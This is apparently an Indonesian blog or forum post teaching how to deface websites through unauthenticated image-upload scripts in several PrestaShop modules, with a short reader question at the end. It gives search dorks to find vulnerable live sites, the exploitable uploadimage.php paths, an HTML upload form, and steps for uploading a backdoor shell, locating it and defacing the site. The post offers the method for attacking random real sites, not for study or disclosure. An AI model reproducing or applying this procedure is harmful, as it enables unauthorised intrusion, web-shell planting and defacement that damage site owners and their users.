Hallo Guys , Gua Mau Share Tutorial Untuk Deface Terbaru Nih , Maksudnya Tutorial Ini Saya Baru Tau :v
Dork :
Inurl:/modules/columnadverts/
Inurl:/modules/homepageadvertise/
Inurl:/modules/productpageadverts/
Inurl:/modules/simpleslideshow/
Exploit
http://loclahost/ modules/columnadverts/uploadimage.php
http://localhost/ modules/homepageadvertise/uploadimage.php
http://localhost/ /modules/productpageadverts/uploadimage.php
http://localhost/ /modules/simpleslideshow/uploadimage.php
CSRF :
<form method="POST" action="http://localhost/modules/modules name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
Langsung Ke Tutorialnya.... :*
1. Cari Target Menggunakan Dork !
2. Pilih Salah Satu Situs Yang Ingin Di cRooTz :v
3. Tambakan Exploit Setelah Url :*
http://localhost/ Exploitnya Pilih Satu Persatu !
Jika Vuln Tampilanya Akan Seperti Ini !
4. Copy CSRF Yang Ada Di Atas Tadi :*
Jangan Lupa Edit Dulu CSRF Tersebut .
Localhost > Website Target .
Modules Name > Nama Exploit Yang Tadi Vuln .
Lalu Simpan Dengan Ex.HTML > All Files
5. Buka CSRF Tersebut , Upload Shell Backdoor Kamu :*
Jika Berhasil Akan Terlihat Seperti Ini
6. Dan Sekarang Lihat Letak Shell Nya
http://localhost/modules/modules name/slides/Nama_Shell.php
Kalau Sudah Ketemu Shellnya , Terserah Deh , Mau Deface Apanya Aja Bebas :*
Terima Kasih!
kook di search dork nya malah keluar cara pretashop nya ?? bukan web vuln ?? cara nya gmn ?
Reply